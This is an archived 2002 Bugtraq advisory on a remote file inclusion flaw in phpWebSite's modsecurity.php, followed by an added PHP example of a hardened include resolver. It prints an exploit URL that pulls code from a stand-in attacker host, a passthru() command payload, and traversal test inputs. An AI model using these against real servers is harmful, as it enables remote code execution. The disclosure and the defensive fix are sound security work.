[27156] in bugtraq
PHP source injection in phpWebSite
daemon@ATHENA.MIT.EDU (Tim Vandermeersch)
Mon Sep 23 14:08:05 2002
Message-ID: <002401c26293$529e3610$397ba8c0@qber66>
From: "Tim Vandermeersch" <Tim.Vandermeersch@pandora.be>
To: <bugtraq@securityfocus.com>
Date: Mon, 23 Sep 2002 01:53:59 +0200
--------------------------------------
| PHP source injection in phpWebSite |
--------------------------------------
Product Description
===================
phpWebSite is written in the PHP Programming Language,
making it ideal for developers to write customized
plug-ins. PHP is a server side programming language
that is simple, cross-platform, and fast. It can be
found at http://phpwebsite.appstate.edu
Tested version
==============
Stable - 0.8.2 (modsecurity.php version < 1.10)
The Problem
===========
phpWebSite comes with a file called
modsecurity.php, which looks like this:
-------- modsecurity.php --------
<?php
global $inc_prefix;
if(!$inc_prefix) {
...
}
...
include_once($inc_prefix."htmlheader.php");
?>
----------------------------------
If someone requests a URL like
http://SERVER/modsecurity.php?inc_prefix=http://MYBOX/,
the htmlheader.php file from MYBOX would be included,
and the attacker would be able to include any code he
wants.
Examples
========
http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/
--- htmlheader.php ---
<? passthru("/bin/ls") ?>
----------------------
Output: dir listing of the current directory
Solution
========
I informed the vendor and they released a new version (1.11)
of the modsecurity.php file which is available from:
http://res1.stddev.appstate.edu/horde/chora/cvs.php/phpwebsite
A new version (0.8.3) has been released, so new users will
never have a modsecurity.php file older than version 1.11
------------------------------
Tim Vandermeersch
Tim.Vandermeersch@pandora.be
http://users.pandora.be/tim/
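
The include pattern described in the advisory, rewritten so the prefix can never come from the request. This is an added example, not part of the original post and not the vendor's 1.11 fix; resolve_include() and the use of __DIR__ as the include directory are assumptions.

```php
<?php
// Added example, not phpWebSite code. resolve_include() is a hypothetical helper.

/**
 * Resolve $file under a fixed, server-chosen base directory.
 * Returns the absolute path, or null if the name is not safe to include.
 */
function resolve_include(string $baseDir, string $file): ?string
{
    // Reject names carrying a stream-wrapper scheme (http://, ftp://, php://, data: ...).
    // Prepending the fixed base already turns such a value into a local path;
    // the explicit check makes the rejection unambiguous.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $file)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "../" and symlinks, and returns false for missing files.
    $path = realpath($base . DIRECTORY_SEPARATOR . $file);
    if ($path === false || !is_file($path)) {
        return null;
    }
    // The resolved path must still sit inside the base directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// The prefix is derived from the script's own location, never from $_GET,
// $_POST, cookies or an uninitialised global.
$incPrefix = __DIR__; // assumption: includes live beside this script

// Constructed inputs: the value from the advisory's URL, a traversal, a normal name.
$candidates = ['http://MYBOX/htmlheader.php', '../../etc/passwd', 'htmlheader.php'];
foreach ($candidates as $candidate) {
    $resolved = resolve_include($incPrefix, $candidate);
    echo $candidate, ' => ', $resolved ?? 'rejected', PHP_EOL;
}

// In the page script itself, include only what resolved cleanly.
$header = resolve_include($incPrefix, 'htmlheader.php');
if ($header !== null) {
    include_once $header;
}
```

In the original code the request could set $inc_prefix only because register_globals copied query parameters into global variables. On current PHP, leaving allow_url_include off also stops include from fetching a remote URL.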